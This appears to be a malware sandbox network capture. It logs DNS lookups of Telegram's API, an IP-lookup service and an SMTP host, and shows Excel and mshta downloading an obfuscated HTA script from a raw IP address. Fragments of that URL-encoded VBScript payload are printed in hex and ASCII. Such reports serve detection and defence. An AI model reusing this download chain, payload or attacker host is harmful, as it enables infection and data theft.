                                    Aug 13, 2024 20:25:36.781001091 CEST8.8.8.8192.168.2.220xb2e7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:36.781001091 CEST8.8.8.8192.168.2.220xb2e7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:38.243093014 CEST8.8.8.8192.168.2.220x7e58No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:48.129477024 CEST8.8.8.8192.168.2.220x3aa7No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:48.129477024 CEST8.8.8.8192.168.2.220x3aa7No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:48.129477024 CEST8.8.8.8192.168.2.220x3aa7No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:48.129477024 CEST8.8.8.8192.168.2.220x3aa7No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:48.300065041 CEST8.8.8.8192.168.2.220x63d1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.237417936 CEST8.8.8.8192.168.2.220x768dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.237417936 CEST8.8.8.8192.168.2.220x768dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.237417936 CEST8.8.8.8192.168.2.220x768dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.237417936 CEST8.8.8.8192.168.2.220x768dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.596009970 CEST8.8.8.8192.168.2.220x4073No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:50.602818966 CEST8.8.8.8192.168.2.220x4073No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.208214045 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.208214045 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.208214045 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.208214045 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.221457005 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.221457005 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.221457005 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:52.221457005 CEST8.8.8.8192.168.2.220x4f4eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:53.453214884 CEST8.8.8.8192.168.2.220xe50No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:53.453214884 CEST8.8.8.8192.168.2.220xe50No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:53.453214884 CEST8.8.8.8192.168.2.220xe50No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:53.453214884 CEST8.8.8.8192.168.2.220xe50No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:53.546375036 CEST8.8.8.8192.168.2.220xbfabNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:54.455672026 CEST8.8.8.8192.168.2.220x283eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:54.509519100 CEST8.8.8.8192.168.2.220xeb07No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:54.509519100 CEST8.8.8.8192.168.2.220xeb07No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:54.509519100 CEST8.8.8.8192.168.2.220xeb07No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:54.509519100 CEST8.8.8.8192.168.2.220xeb07No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.979156017 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.979156017 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.979156017 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.979156017 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.990202904 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.990202904 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.990202904 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.990202904 CEST8.8.8.8192.168.2.220xae3eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:55.990869045 CEST8.8.8.8192.168.2.220x8c1cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.164316893 CEST8.8.8.8192.168.2.220xc200No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.164316893 CEST8.8.8.8192.168.2.220xc200No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.164316893 CEST8.8.8.8192.168.2.220xc200No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.164316893 CEST8.8.8.8192.168.2.220xc200No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.252751112 CEST8.8.8.8192.168.2.220x400No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:57.999084949 CEST8.8.8.8192.168.2.220x283eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:58.568182945 CEST8.8.8.8192.168.2.220xc07bNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:58.568182945 CEST8.8.8.8192.168.2.220xc07bNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:58.568182945 CEST8.8.8.8192.168.2.220xc07bNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:58.568182945 CEST8.8.8.8192.168.2.220xc07bNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:59.193537951 CEST8.8.8.8192.168.2.220x829cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:01.142604113 CEST8.8.8.8192.168.2.220xd63bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:01.149301052 CEST8.8.8.8192.168.2.220xd63bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.399425030 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.399425030 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.399425030 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.399425030 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.406886101 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.406886101 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.406886101 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.406886101 CEST8.8.8.8192.168.2.220x4286No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.584681988 CEST8.8.8.8192.168.2.220xfe88No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:02.591463089 CEST8.8.8.8192.168.2.220xfe88No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.602960110 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.602960110 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.602960110 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.602960110 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.615492105 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.615492105 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.615492105 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:04.615492105 CEST8.8.8.8192.168.2.220x3bd0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:06.478807926 CEST8.8.8.8192.168.2.220xb1f3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:07.595563889 CEST8.8.8.8192.168.2.220xc6e8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:26:07.606969118 CEST8.8.8.8192.168.2.220xc6e8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    • exi.link
                                    • reallyfreegeoip.org
                                    • api.telegram.org
                                    • 192.3.176.138
                                    • checkip.dyndns.org
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.2249162192.3.176.138801208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:24.944986105 CEST336OUTGET /xampp/sop/40.hta HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 192.3.176.138
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:24:25.427314043 CEST1236INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:25 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                    Last-Modified: Tue, 13 Aug 2024 15:03:58 GMT
                                    ETag: "14b8e-61f91eb4fa2a5"
                                    Accept-Ranges: bytes
                                    Content-Length: 84878
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/hta
                                    Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 33 44 25 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 32 25 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 33 44 25 32 35 32 32 49 45 25 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 32 25 32 35 32 30 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 6f 64 79 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 73 43 72 69 50 74 25 32 35 32 30 54 79 50 45 25 32 35 33 44 25 32 35 32 32 54 65 78 74 2f 76 42 53 43 72 69 70 54 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 44 49 6d 25 32 35 30 39 25 [TRUNCATED]
                                    Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253C%2521DOCTYPE%2520html%253E%250A%253Cmeta%2520http-equiv%253D%2522X-UA-Compatible%2522%2520content%253D%2522IE%253DEmulateIE8%2522%2520%253E%250A%253Chtml%253E%250A%253Cbody%253E%250A%253CsCriPt%2520TyPE%253D%2522Text/vBSCripT%2522%253E%250ADIm%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509
                                    Aug 13, 2024 20:24:25.427376032 CEST1236INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25
                                    Aug 13, 2024 20:24:25.427411079 CEST1236INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25
                                    Aug 13, 2024 20:24:25.427447081 CEST672INData Raw: 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35
                                    Data Ascii: 2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%252C%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%250
                                    Aug 13, 2024 20:24:25.427582979 CEST1236INData Raw: 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39
                                    Data Ascii: 09%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%
                                    Aug 13, 2024 20:24:25.427634001 CEST1236INData Raw: 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39
                                    Data Ascii: 09%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%
                                    Aug 13, 2024 20:24:25.427669048 CEST1236INData Raw: 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25
                                    Data Ascii: 9%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%253A%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2
                                    Aug 13, 2024 20:24:25.427700996 CEST672INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25
                                    Aug 13, 2024 20:24:25.427733898 CEST1236INData Raw: 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25
                                    Data Ascii: 9%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2
                                    Aug 13, 2024 20:24:25.427767992 CEST1236INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 64 74 4d 78 4f 47 62 4e 45 71 56 74 6c 6d 56 6f 62 76 50 4c 46 69 73 56 48 79 76 5a 64 46 63 69 79 53 6b 6e 4c 49 73 74 54 56 46 51 71 46 54 72 65 43 79 43
                                    Data Ascii: %2509%2509%2509%2509%2509%2509dtMxOGbNEqVtlmVobvPLFisVHyvZdFciySknLIstTVFQqFTreCyCHBSJHFGzfMPyUCrqjuUHBNSSTPBAdkQDshQptQUcoPbFfdiBwXiWoyIvkaxkLbUKZjOhFLoCQXnXVfMPOAKKWMfsCthQSJKQSPoHhaPWcqbWdqdbzlcpolkGkcgNmRpTmhRkMqxdkeTXtrjfSmKieCXfxkXwIhK%2
                                    Aug 13, 2024 20:24:25.432523966 CEST1236INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.2249164192.3.176.138802480C:\Windows\System32\mshta.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:28.934544086 CEST413OUTGET /xampp/sop/40.hta HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-US
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 192.3.176.138
                                    Connection: Keep-Alive
                                    Range: bytes=8897-
                                    If-Range: "14b8e-61f91eb4fa2a5"
                                    Aug 13, 2024 20:24:29.440838099 CEST1236INHTTP/1.1 206 Partial Content
                                    Date: Tue, 13 Aug 2024 18:24:29 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                    Last-Modified: Tue, 13 Aug 2024 15:03:58 GMT
                                    ETag: "14b8e-61f91eb4fa2a5"
                                    Accept-Ranges: bytes
                                    Content-Length: 75981
                                    Content-Range: bytes 8897-84877/84878
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/hta
                                    Data Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 [TRUNCATED]
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509dtMxOGbNEqVtlmVobvPLFisVHyvZdFciySknLIstTVFQqFTreCyCHBS
                                    Aug 13, 2024 20:24:29.440891981 CEST1236INData Raw: 4a 48 46 47 7a 66 4d 50 79 55 43 72 71 6a 75 55 48 42 4e 53 53 54 50 42 41 64 6b 51 44 73 68 51 70 74 51 55 63 6f 50 62 46 66 64 69 42 77 58 69 57 6f 79 49 76 6b 61 78 6b 4c 62 55 4b 5a 6a 4f 68 46 4c 6f 43 51 58 6e 58 56 66 4d 50 4f 41 4b 4b 57
                                    Data Ascii: JHFGzfMPyUCrqjuUHBNSSTPBAdkQDshQptQUcoPbFfdiBwXiWoyIvkaxkLbUKZjOhFLoCQXnXVfMPOAKKWMfsCthQSJKQSPoHhaPWcqbWdqdbzlcpolkGkcgNmRpTmhRkMqxdkeTXtrjfSmKieCXfxkXwIhK%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2
                                    Aug 13, 2024 20:24:29.440928936 CEST1236INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25
                                    Aug 13, 2024 20:24:29.440963984 CEST1236INData Raw: 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35
